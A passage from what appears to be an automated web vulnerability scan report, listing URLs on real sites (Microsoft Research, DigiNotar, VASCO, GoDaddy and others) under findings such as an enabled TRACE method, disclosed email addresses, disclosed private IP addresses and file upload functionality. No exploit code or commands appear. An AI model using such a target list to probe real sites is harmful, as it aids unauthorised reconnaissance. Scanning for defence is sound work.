18.88. http://research.microsoft.com/en-us/jobs/intern/about_uk.aspx

18.89. http://research.microsoft.com/en-us/jobs/intern/about_wa.aspx

18.90. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx

18.91. http://research.microsoft.com/en-us/jobs/intern/default.aspx

18.92. http://research.microsoft.com/en-us/jobs/intern/russia.aspx

18.93. http://research.microsoft.com/en-us/labs/asia/default.aspx

18.94. http://research.microsoft.com/en-us/labs/cambridge/default.aspx

18.95. http://research.microsoft.com/en-us/labs/cmic/default.aspx

18.96. http://research.microsoft.com/en-us/labs/default.aspx

18.97. http://research.microsoft.com/en-us/labs/emic/default.aspx

18.98. http://research.microsoft.com/en-us/labs/fuse/default.aspx

18.99. http://research.microsoft.com/en-us/labs/ilabs/default.aspx

18.100. http://research.microsoft.com/en-us/labs/india/default.aspx

18.101. http://research.microsoft.com/en-us/labs/newengland/

18.102. http://research.microsoft.com/en-us/labs/newengland/default.aspx

18.103. http://research.microsoft.com/en-us/labs/redmond/default.aspx

18.104. http://research.microsoft.com/en-us/labs/siliconvalley/default.aspx

18.105. http://research.microsoft.com/en-us/labs/xcg/default.aspx

18.106. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx

18.107. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx

18.108. http://research.microsoft.com/en-us/news/features/interns-080309.aspx

18.109. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx

18.110. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx

18.111. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx

18.112. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx

18.113. http://research.microsoft.com/en-us/news/headlines/2011womenscholarships-012811.aspx

18.114. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx

18.115. http://research.microsoft.com/en-us/people/abadi/default.aspx

18.116. http://research.microsoft.com/en-us/people/adiamant/default.aspx

18.117. http://research.microsoft.com/en-us/people/ajbrush/default.aspx

18.118. http://research.microsoft.com/en-us/people/akashl/

18.119. http://research.microsoft.com/en-us/people/alecw/

18.120. http://research.microsoft.com/en-us/people/alexac/default.aspx

18.121. http://research.microsoft.com/en-us/people/aphillip/

18.122. http://research.microsoft.com/en-us/people/aproutie/

18.123. http://research.microsoft.com/en-us/people/aratan/default.aspx

18.124. http://research.microsoft.com/en-us/people/asellen/

18.125. http://research.microsoft.com/en-us/people/asellen/default.aspx

18.126. http://research.microsoft.com/en-us/people/bainguo/default.aspx

18.127. http://research.microsoft.com/en-us/people/bibuxton/default.aspx

18.128. http://research.microsoft.com/en-us/people/birrell/default.aspx

18.129. http://research.microsoft.com/en-us/people/blinn/default.aspx

18.130. http://research.microsoft.com/en-us/people/bycook/default.aspx

18.131. http://research.microsoft.com/en-us/people/cthacker/default.aspx

18.132. http://research.microsoft.com/en-us/people/dburger/

18.133. http://research.microsoft.com/en-us/people/dburger/default.aspx

18.134. http://research.microsoft.com/en-us/people/deng/default.aspx

18.135. http://research.microsoft.com/en-us/people/dmb/

18.136. http://research.microsoft.com/en-us/people/dmb/default.aspx

18.137. http://research.microsoft.com/en-us/people/dwork/

18.138. http://research.microsoft.com/en-us/people/gbell/default.aspx

18.139. http://research.microsoft.com/en-us/people/ggr/default.aspx

18.140. http://research.microsoft.com/en-us/people/goldberg/default.aspx

18.141. http://research.microsoft.com/en-us/people/grama/default.aspx

18.142. http://research.microsoft.com/en-us/people/gray/

18.143. http://research.microsoft.com/en-us/people/gray/default.aspx

18.144. http://research.microsoft.com/en-us/people/hon/default.aspx

18.145. http://research.microsoft.com/en-us/people/horvitz/default.aspx

18.146. http://research.microsoft.com/en-us/people/hsalama/default.aspx

18.147. http://research.microsoft.com/en-us/people/hshum/default.aspx

18.148. http://research.microsoft.com/en-us/people/indranim/

18.149. http://research.microsoft.com/en-us/people/jamiesho/

18.150. http://research.microsoft.com/en-us/people/jbishop/default.aspx

18.151. http://research.microsoft.com/en-us/people/jiansun/default.aspx

18.152. http://research.microsoft.com/en-us/people/johndo/default.aspx

18.153. http://research.microsoft.com/en-us/people/jplatt/default.aspx

18.154. http://research.microsoft.com/en-us/people/jtw/default.aspx

18.155. http://research.microsoft.com/en-us/people/krw/default.aspx

18.156. http://research.microsoft.com/en-us/people/kstrauss/

18.157. http://research.microsoft.com/en-us/people/larus/default.aspx

18.158. http://research.microsoft.com/en-us/people/lilich/

18.159. http://research.microsoft.com/en-us/people/lilich/default.aspx

18.160. http://research.microsoft.com/en-us/people/lintaoz/default.aspx

18.161. http://research.microsoft.com/en-us/people/liuj/default.aspx

18.162. http://research.microsoft.com/en-us/people/lomet/default.aspx

18.163. http://research.microsoft.com/en-us/people/luca/default.aspx

18.164. http://research.microsoft.com/en-us/people/malvar/

18.165. http://research.microsoft.com/en-us/people/malvar/default.aspx

18.166. http://research.microsoft.com/en-us/people/manuelc/default.aspx

18.167. http://research.microsoft.com/en-us/people/marycz/default.aspx

18.168. http://research.microsoft.com/en-us/people/mds/

18.169. http://research.microsoft.com/en-us/people/mds/default.aspx

18.170. http://research.microsoft.com/en-us/people/milanv/

18.171. http://research.microsoft.com/en-us/people/milanv/default.aspx

18.172. http://research.microsoft.com/en-us/people/mzh/

18.173. http://research.microsoft.com/en-us/people/najork/default.aspx

18.174. http://research.microsoft.com/en-us/people/pachou/default.aspx

18.175. http://research.microsoft.com/en-us/people/padmanab/default.aspx

18.176. http://research.microsoft.com/en-us/people/palarson/default.aspx

18.177. http://research.microsoft.com/en-us/people/parno/

18.178. http://research.microsoft.com/en-us/people/philbe/

18.179. http://research.microsoft.com/en-us/people/philbe/default.aspx

18.180. http://research.microsoft.com/en-us/people/ramjee/

18.181. http://research.microsoft.com/en-us/people/ranveer/default.aspx

18.182. http://research.microsoft.com/en-us/people/rashid/default.aspx

18.183. http://research.microsoft.com/en-us/people/richdr/default.aspx

18.184. http://research.microsoft.com/en-us/people/robertson/default.aspx

18.185. http://research.microsoft.com/en-us/people/roylevin/

18.186. http://research.microsoft.com/en-us/people/sdumais/default.aspx

18.187. http://research.microsoft.com/en-us/people/shuvendu/default.aspx

18.188. http://research.microsoft.com/en-us/people/simonpj/

18.189. http://research.microsoft.com/en-us/people/simonpj/default.aspx

18.190. http://research.microsoft.com/en-us/people/spli/

18.191. http://research.microsoft.com/en-us/people/surajitc/

18.192. http://research.microsoft.com/en-us/people/surajitc/default.aspx

18.193. http://research.microsoft.com/en-us/people/terry/default.aspx

18.194. http://research.microsoft.com/en-us/people/thekkath/default.aspx

18.195. http://research.microsoft.com/en-us/people/thoare/

18.196. http://research.microsoft.com/en-us/people/thoare/default.aspx

18.197. http://research.microsoft.com/en-us/people/tonyhey/default.aspx

18.198. http://research.microsoft.com/en-us/people/tsharp/

18.199. http://research.microsoft.com/en-us/people/wenwuzhu/default.aspx

18.200. http://research.microsoft.com/en-us/people/wobber/default.aspx

18.201. http://research.microsoft.com/en-us/people/wong/default.aspx

18.202. http://research.microsoft.com/en-us/people/wyma/

18.203. http://research.microsoft.com/en-us/people/zhao/default.aspx

18.204. http://research.microsoft.com/en-us/press/ablake.aspx

18.205. http://research.microsoft.com/en-us/press/anandan.aspx

18.206. http://research.microsoft.com/en-us/press/bainguo.aspx

18.207. http://research.microsoft.com/en-us/press/borgs.aspx

18.208. http://research.microsoft.com/en-us/press/cmbishop.aspx

18.209. http://research.microsoft.com/en-us/press/default.aspx

18.210. http://research.microsoft.com/en-us/press/fastfacts.aspx

18.211. http://research.microsoft.com/en-us/press/hon.aspx

18.212. http://research.microsoft.com/en-us/press/jchayes.aspx

18.213. http://research.microsoft.com/en-us/press/kevinsch.aspx

18.214. http://research.microsoft.com/en-us/press/kwood.aspx

18.215. http://research.microsoft.com/en-us/press/malvar.aspx

18.216. http://research.microsoft.com/en-us/press/mds.aspx

18.217. http://research.microsoft.com/en-us/press/overview.aspx

18.218. http://research.microsoft.com/en-us/press/rajamani.aspx

18.219. http://research.microsoft.com/en-us/press/roylevin.aspx

18.220. http://research.microsoft.com/en-us/press/telabbady.aspx

18.221. http://research.microsoft.com/en-us/projects/chem4word/default.aspx

18.222. http://research.microsoft.com/en-us/projects/creativecommons/default.aspx

18.223. http://research.microsoft.com/en-us/projects/csec/

18.224. http://research.microsoft.com/en-us/projects/nodexl/

18.225. http://research.microsoft.com/en-us/projects/researchgames/

18.226. http://research.microsoft.com/en-us/projects/serviceos/

18.227. http://research.microsoft.com/en-us/projects/wwt/contest.aspx

18.228. http://research.microsoft.com/en-us/projects/wwt/default.aspx

18.229. http://research.microsoft.com/en-us/research/default.aspx

18.230. http://research.microsoft.com/en-us/um/people/awf/

18.231. http://research.microsoft.com/en-us/um/people/bahl/

18.232. http://research.microsoft.com/en-us/um/people/borgs/

18.233. http://research.microsoft.com/en-us/um/people/jchayes/

18.234. http://research.microsoft.com/en-us/um/people/szeliski/

18.235. http://research.microsoft.com/en-us/um/redmond/about/timeline/

18.236. http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/

18.237. http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/download.aspx

18.238. http://research.microsoft.com/feedGen/

18.239. http://research.microsoft.com/nothing.html

18.240. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

18.241. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

18.242. http://vasco.com/company/contactus.aspx

18.243. http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx

18.244. http://vasco.com/favicon.ico

18.245. http://vasco.com/images/css/readmore_bg.gif

18.246. http://vasco.com/investor_relations/investor_press/investors_press.aspx

18.247. http://vasco.com/services/services.aspx

18.248. http://vasco.com/support/support_and_downloads.aspx

18.249. http://vasco.com/training/our_offering/elearning/certified_ethical_hacking.aspx

18.250. http://vasco.com/user_registration.aspx

18.251. http://vasco.com/verticals/appsecurity/online_application_security_overview.aspx

18.252. http://vasco.com/verticals/banking/onlinebanking.aspx

18.253. http://vasco.com/verticals/netsecurity/network_access_security.aspx

18.254. http://www.cheapssls.com/

18.255. http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html

18.256. http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html

18.257. http://www.cheapssls.com/geotrust-ssl-certificates/

18.258. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html

18.259. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html

18.260. http://www.cheapssls.com/geotrust-ssl-certificates/rapidssl.html

18.261. http://www.cheapssls.com/index.php

18.262. https://www.cheapssls.com/

18.263. https://www.cheapssls.com/index.php

18.264. http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx

18.265. http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx

18.266. http://www.godaddy.com/Payment/payment-options.aspx

18.267. http://www.godaddy.com/affiliates/affiliate-program.aspx

18.268. http://www.godaddy.com/gdshop/offers/cross_sell.asp

18.269. http://www.godaddy.com/ssl/ssl-certificates.aspx

18.270. http://www.hostnj.net/

18.271. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/

18.272. http://www.meetup.com/

18.273. http://www.meetup.com/Boston-BizSpark-Meetup/

18.274. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/

18.275. http://www.meetup.com/sponsorships/

18.276. http://www.meetup.com/whats_new/

18.277. http://www.microcad.ca/

18.278. http://www.microcad.ca/cart

18.279. http://www.microcad.ca/customerservice/about

18.280. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

18.281. https://www.microcad.ca/auth/login

18.282. https://www.microcad.ca/checkout/address

18.283. http://www.microsoft-careers.com/find.job

18.284. http://www.microsoft-careers.com/job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/

18.285. http://www.microsoft-careers.com/job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/

18.286. http://www.microsoft-careers.com/job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/

18.287. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/

18.288. http://www.microsoft-careers.com/job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/

18.289. http://www.microsoft-careers.com/job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/

18.290. http://www.microsoft-careers.com/job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/

18.291. http://www.microsoft-careers.com/search

18.292. https://www.microsoft-careers.com/

18.293. https://www.microsoft-careers.com/content/corporate-research/

18.294. https://www.microsoft-careers.com/find.job

18.295. https://www.microsoft-careers.com/find.job

18.296. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/

18.297. https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/

18.298. https://www.microsoft-careers.com/talentcommunity/subscribe/

18.299. http://www.omniture.com/en/

18.300. http://www.register.com/

18.301. http://www.register.com/domain/searchresults.rcmx

18.302. http://www.register.com/unauthenticated_session_expired.rcmx

18.303. https://www.sslmatrix.com/Order/quickorder

18.304. https://www.sslmatrix.com/ssl-promotion-code

18.305. https://www.sslmatrix.com/ssl-promotion-code/ssl-price

18.306. http://www.vasco.com/favicon.ico

18.307. http://www.vasco.com/images/css/readmore_bg.gif

19. File upload functionality

20. TRACE method is enabled

20.1. http://bh.contextweb.com/

20.2. http://content.etilize.com/

20.3. http://image2.pubmatic.com/

20.4. http://login.dotomi.com/

20.5. http://pixel.rubiconproject.com/

20.6. http://www.register.com/

20.7. http://www.shrinktheweb.com/

21. Email addresses disclosed

21.1. http://a1848.g.akamai.net/7/1848/13927/v001/godaddysof1.download.akamai.com/13755/GDAffiliate_ACH_640x360_large.flv

21.2. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json

21.3. https://cart.godaddy.com/basket.aspx

21.4. http://diginotar.nl/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js

21.5. http://diginotar.nl/Portals/_default/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js

21.6. http://diginotar.nl/controls/SolpartMenu/spmenu.js

21.7. http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

21.8. https://idp.godaddy.com/login.aspx

21.9. https://idp.godaddy.com/retrieveaccount.aspx

21.10. http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js

21.11. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/363c/maps2/%7Bmain,mod_util,mod_act,mod_act_s,mod_actbr,mod_adf,mod_appiw,mod_mg,mod_mssvt,mod_rst,mod_strr%7D.js

21.12. http://microsoftcambridge.com/Events/tabid/57/Default.aspx

21.13. http://microsoftcambridge.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

21.14. http://microsoftcambridge.com/Resources/Shared/scripts/widgets.js

21.15. http://microsoftcambridge.com/controls/SolpartMenu/spmenu.js

21.16. http://research.microsoft.com/en-us/about/contactus.aspx

21.17. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx

21.18. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx

21.19. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx

21.20. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx

21.21. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx

21.22. http://research.microsoft.com/en-us/events/escience2011/

21.23. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx

21.24. http://research.microsoft.com/en-us/labs/cmic/default.aspx

21.25. http://research.microsoft.com/en-us/labs/ilabs/default.aspx

21.26. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx

21.27. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx

21.28. http://research.microsoft.com/en-us/news/features/interns-080309.aspx

21.29. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx

21.30. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx

21.31. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx

21.32. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx

21.33. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx

21.34. http://research.microsoft.com/en-us/people/bycook/default.aspx

21.35. http://research.microsoft.com/en-us/people/gray/

21.36. http://research.microsoft.com/en-us/people/gray/default.aspx

21.37. http://research.microsoft.com/en-us/people/larus/default.aspx

21.38. http://research.microsoft.com/en-us/people/liuj/default.aspx

21.39. http://research.microsoft.com/en-us/people/padmanab/default.aspx

21.40. http://research.microsoft.com/en-us/people/palarson/default.aspx

21.41. http://research.microsoft.com/en-us/people/philbe/

21.42. http://research.microsoft.com/en-us/people/philbe/default.aspx

21.43. http://research.microsoft.com/en-us/people/ramjee/

21.44. http://research.microsoft.com/en-us/people/ranveer/default.aspx

21.45. http://research.microsoft.com/en-us/people/richdr/default.aspx

21.46. http://research.microsoft.com/en-us/people/simonpj/

21.47. http://research.microsoft.com/en-us/people/simonpj/default.aspx

21.48. http://research.microsoft.com/en-us/people/thekkath/default.aspx

21.49. http://research.microsoft.com/en-us/press/default.aspx

21.50. http://research.microsoft.com/en-us/projects/wwt/contest.aspx

21.51. http://research.microsoft.com/en-us/um/people/abegel/starlogo/starlogo-kybernetes-paper.doc

21.52. http://research.microsoft.com/en-us/um/people/bahl/

21.53. http://research.microsoft.com/en-us/um/people/blampson/

21.54. http://research.microsoft.com/en-us/um/people/borgs/

21.55. http://research.microsoft.com/en-us/um/people/heckerman/

21.56. http://research.microsoft.com/en-us/um/people/hjzhang/

21.57. http://research.microsoft.com/en-us/um/people/horvitz/

21.58. http://research.microsoft.com/en-us/um/people/jchayes/

21.59. http://research.microsoft.com/en-us/um/people/jgrudin/

21.60. http://research.microsoft.com/en-us/um/people/sdumais/

21.61. http://research.microsoft.com/en-us/um/people/ssaponas/

21.62. http://research.microsoft.com/en-us/um/people/szeliski/

21.63. http://research.microsoft.com/en-us/um/people/zhang/

21.64. http://research.microsoft.com/en-us/um/redmond/groups/ivm/ICE/

21.65. http://research.microsoft.com/en-us/um/redmond/groups/ivm/hdview/

21.66. http://research.microsoft.com/en-us/um/redmond/projects/songsmith/

21.67. http://scripts.omniture.com/javascript.js

21.68. http://shop.vasco.com/error_500.aspx

21.69. https://shop.vasco.com/legal.aspx

21.70. https://shop.vasco.com/privacy_statement.aspx

21.71. https://shop.vasco.com/terms_and_conditions.aspx

21.72. http://static.tumblr.com/fftf9xi/GXWlp9jjo/core.css

21.73. https://support.microsoft.com/contactus/emailcontact.aspx

21.74. http://twitter.com/account/bootstrap_data

21.75. http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx

21.76. http://vasco.com/js/rotating_banner.js

21.77. http://vasco.com/user_registration.aspx

21.78. http://w.sharethis.com/button/buttons.js

21.79. http://www.digicert.com/

21.80. http://www.diginotar.com/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js

21.81. http://www.diginotar.com/Products/ExtendedValidationSSL/tabid/622/Default.aspx

21.82. http://www.diginotar.com/Products/Identity/CertiIDManagedPKI/tabid/2246/Default.aspx

21.83. http://www.diginotar.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

21.84. http://www.diginotar.com/Resources/Shared/scripts/widgets.js

21.85. http://www.diginotar.com/controls/SolpartMenu/spmenu.js

21.86. http://www.diginotar.com/portals/0/PrivacyStatement.pdf

21.87. https://www.diginotar.com/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js

21.88. https://www.diginotar.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

21.89. https://www.diginotar.com/Resources/Shared/scripts/widgets.js

21.90. https://www.diginotar.com/controls/SolpartMenu/spmenu.js

21.91. http://www.diginotar.nl/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js

21.92. http://www.diginotar.nl/controls/SolpartMenu/spmenu.js

21.93. http://www.dnncreative.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

21.94. http://www.dnncreative.com/Resources/Shared/scripts/widgets.js

21.95. http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx

21.96. http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx

21.97. http://www.godaddy.com/Payment/payment-options.aspx

21.98. http://www.godaddy.com/affiliates/affiliate-program.aspx

21.99. http://www.godaddy.com/gdshop/offers/cross_sell.asp

21.100. http://www.godaddy.com/ssl/ssl-certificates.aspx

21.101. http://www.hostnj.net/

21.102. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/

21.103. http://www.hostnj.net/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js

21.104. http://www.microsoft-careers.com/find.job

21.105. http://www.microsoft-careers.com/job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/

21.106. http://www.microsoft-careers.com/job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/

21.107. http://www.microsoft-careers.com/job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/

21.108. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/

21.109. http://www.microsoft-careers.com/job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/

21.110. http://www.microsoft-careers.com/job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/

21.111. http://www.microsoft-careers.com/job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/

21.112. http://www.microsoft-careers.com/search

21.113. https://www.microsoft-careers.com/

21.114. https://www.microsoft-careers.com/content/corporate-research/

21.115. https://www.microsoft-careers.com/find.job

21.116. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/

21.117. https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/

21.118. https://www.microsoft-careers.com/talentcommunity/subscribe/

21.119. http://www.register.com/js/domain-taken.js

21.120. http://www.register.com/js/jquery.cookie.js

21.121. https://www.sslmatrix.com/script/jquery.hoverIntent.js

21.122. https://www.sslmatrix.com/script/jquery.jqGrid.min.js

21.123. https://www.sslmatrix.com/script/jquery_menu.js

21.124. http://www.vasco.com/js/rotating_banner.js

22. Private IP addresses disclosed

22.1. http://research.microsoft.com/Search

22.2. http://research.microsoft.com/apps/dp/areas.aspx

22.3. http://research.microsoft.com/apps/dp/blank.jpg

22.4. http://research.microsoft.com/apps/dp/dl/downloads.aspx

22.5. http://research.microsoft.com/apps/dp/downloads.aspx

22.6. http://research.microsoft.com/apps/dp/ev/events.aspx

22.7. http://research.microsoft.com/apps/dp/gr/groups.aspx

22.8. http://research.microsoft.com/apps/dp/groups.aspx

22.9. http://research.microsoft.com/apps/dp/i/reverse_

22.10. http://research.microsoft.com/apps/dp/ne/news.aspx

22.11. http://research.microsoft.com/apps/dp/news.aspx

22.12. http://research.microsoft.com/apps/dp/pe/people.aspx

22.13. http://research.microsoft.com/apps/dp/pr/projects.aspx

22.14. http://research.microsoft.com/apps/dp/projects.aspx

22.15. http://research.microsoft.com/apps/dp/pu/publications.aspx

22.16. http://research.microsoft.com/apps/dp/search.aspx

22.17. http://research.microsoft.com/apps/dp/search.aspx

22.18. http://research.microsoft.com/apps/dp/vi/videos.aspx

22.19. http://research.microsoft.com/apps/pubs/default.aspx

22.20. http://research.microsoft.com/apps/pubs/default.aspx

22.21. http://research.microsoft.com/apps/search/videosearch.ashx

22.22. http://research.microsoft.com/apps/video/default.aspx

22.23. http://research.microsoft.com/apps/video/default.aspx

22.24. http://research.microsoft.com/en-us/about/awards.aspx

22.25. http://research.microsoft.com/en-us/about/brochure-1.aspx

22.26. http://research.microsoft.com/en-us/about/brochure-2.aspx

22.27. http://research.microsoft.com/en-us/about/brochure-3.aspx

22.28. http://research.microsoft.com/en-us/about/brochure-4.aspx

22.29. http://research.microsoft.com/en-us/about/brochure-5.aspx

22.30. http://research.microsoft.com/en-us/about/brochure-6.aspx

22.31. http://research.microsoft.com/en-us/about/brochure-7.aspx

22.32. http://research.microsoft.com/en-us/about/brochure-8.aspx

22.33. http://research.microsoft.com/en-us/about/brochure-9.aspx

22.34. http://research.microsoft.com/en-us/about/contactus.aspx

22.35. http://research.microsoft.com/en-us/about/default.aspx

22.36. http://research.microsoft.com/en-us/about/directors.aspx

22.37. http://research.microsoft.com/en-us/about/feature/downloads.aspx

22.38. http://research.microsoft.com/en-us/about/paperawards.aspx

22.39. http://research.microsoft.com/en-us/collaboration/about/default.aspx

22.40. http://research.microsoft.com/en-us/collaboration/about/events.aspx

22.41. http://research.microsoft.com/en-us/collaboration/about/projects.aspx

22.42. http://research.microsoft.com/en-us/collaboration/about/summits.aspx

22.43. http://research.microsoft.com/en-us/collaboration/awards/default.aspx

22.44. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx

22.45. http://research.microsoft.com/en-us/collaboration/awards/fellowships.aspx

22.46. http://research.microsoft.com/en-us/collaboration/awards/opportunities.aspx

22.47. http://research.microsoft.com/en-us/collaboration/bg_txt.png

22.48. http://research.microsoft.com/en-us/collaboration/default.aspx

22.49. http://research.microsoft.com/en-us/collaboration/focus/cs/default.aspx

22.50. http://research.microsoft.com/en-us/collaboration/focus/e3/default.aspx

22.51. http://research.microsoft.com/en-us/collaboration/focus/education/default.aspx

22.52. http://research.microsoft.com/en-us/collaboration/focus/escience/default.aspx

22.53. http://research.microsoft.com/en-us/collaboration/focus/health/default.aspx

22.54. http://research.microsoft.com/en-us/collaboration/focus/nui/default.aspx

22.55. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/default.aspx

22.56. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx

22.57. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/mstc.aspx

22.58. http://research.microsoft.com/en-us/collaboration/global/europe/default.aspx

22.59. http://research.microsoft.com/en-us/collaboration/global/europe/europe-awards.aspx

22.60. http://research.microsoft.com/en-us/collaboration/global/india/default.aspx

22.61. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx

22.62. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx

22.63. http://research.microsoft.com/en-us/collaboration/global/latam/default.aspx

22.64. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx

22.65. http://research.microsoft.com/en-us/collaboration/global/me-africa/default.aspx

22.66. http://research.microsoft.com/en-us/collaboration/global/northam/default.aspx

22.67. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx

22.68. http://research.microsoft.com/en-us/collaboration/institutes/default.aspx

22.69. http://research.microsoft.com/en-us/collaboration/tools/default.aspx

22.70. http://research.microsoft.com/en-us/community/default.aspx

22.71. http://research.microsoft.com/en-us/default.aspx

22.72. http://research.microsoft.com/en-us/default.aspx

22.73. http://research.microsoft.com/en-us/events/escience2011/

22.74. http://research.microsoft.com/en-us/events/indiaschooljune2011/

22.75. http://research.microsoft.com/en-us/events/women-in-computing2011/

22.76. http://research.microsoft.com/en-us/jobs/default.aspx

22.77. http://research.microsoft.com/en-us/jobs/default.aspx

22.78. http://research.microsoft.com/en-us/jobs/fulltime/default.aspx

22.79. http://research.microsoft.com/en-us/jobs/fulltime/researcher.aspx

22.80. http://research.microsoft.com/en-us/jobs/intern/about_asia-pacific.aspx

22.81. http://research.microsoft.com/en-us/jobs/intern/about_ca.aspx

22.82. http://research.microsoft.com/en-us/jobs/intern/about_india.aspx

22.83. http://research.microsoft.com/en-us/jobs/intern/about_uk.aspx

22.84. http://research.microsoft.com/en-us/jobs/intern/about_wa.aspx

22.85. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx

22.86. http://research.microsoft.com/en-us/jobs/intern/default.aspx

22.87. http://research.microsoft.com/en-us/jobs/intern/russia.aspx

22.88. http://research.microsoft.com/en-us/labs/asia/default.aspx

22.89. http://research.microsoft.com/en-us/labs/cambridge/default.aspx

22.90. http://research.microsoft.com/en-us/labs/cmic/default.aspx

22.91. http://research.microsoft.com/en-us/labs/default.aspx

22.92. http://research.microsoft.com/en-us/labs/emic/default.aspx

22.93. http://research.microsoft.com/en-us/labs/fuse/default.aspx

22.94. http://research.microsoft.com/en-us/labs/ilabs/default.aspx

22.95. http://research.microsoft.com/en-us/labs/india/default.aspx

22.96. http://research.microsoft.com/en-us/labs/newengland/

22.97. http://research.microsoft.com/en-us/labs/newengland/default.aspx

22.98. http://research.microsoft.com/en-us/labs/redmond/default.aspx

22.99. http://research.microsoft.com/en-us/labs/siliconvalley/default.aspx

22.100. http://research.microsoft.com/en-us/labs/xcg/default.aspx

22.101. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx

22.102. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx

22.103. http://research.microsoft.com/en-us/news/features/interns-080309.aspx

22.104. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx

22.105. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx

22.106. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx

22.107. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx

22.108. http://research.microsoft.com/en-us/news/headlines/2011womenscholarships-012811.aspx

22.109. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx

22.110. http://research.microsoft.com/en-us/people/abadi/default.aspx

22.111. http://research.microsoft.com/en-us/people/adiamant/default.aspx

22.112. http://research.microsoft.com/en-us/people/ajbrush/default.aspx

22.113. http://research.microsoft.com/en-us/people/akashl/

